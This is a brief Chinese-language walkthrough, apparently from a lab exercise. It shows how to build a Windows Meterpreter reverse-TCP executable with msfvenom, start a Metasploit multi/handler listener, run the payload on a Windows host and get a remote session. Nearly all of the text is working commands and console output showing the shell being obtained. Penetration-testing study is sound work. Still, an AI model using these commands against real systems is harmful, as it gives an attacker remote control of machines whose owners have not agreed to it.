網絡拓撲:
kaili系統版本:
注:前面的版本在生成shellcode的時候用的是msfpayload命令
1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
3.將生成的sehllcode上傳至windows主機中並運行:
4.已經有session返回
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000
5.成功拿到shell: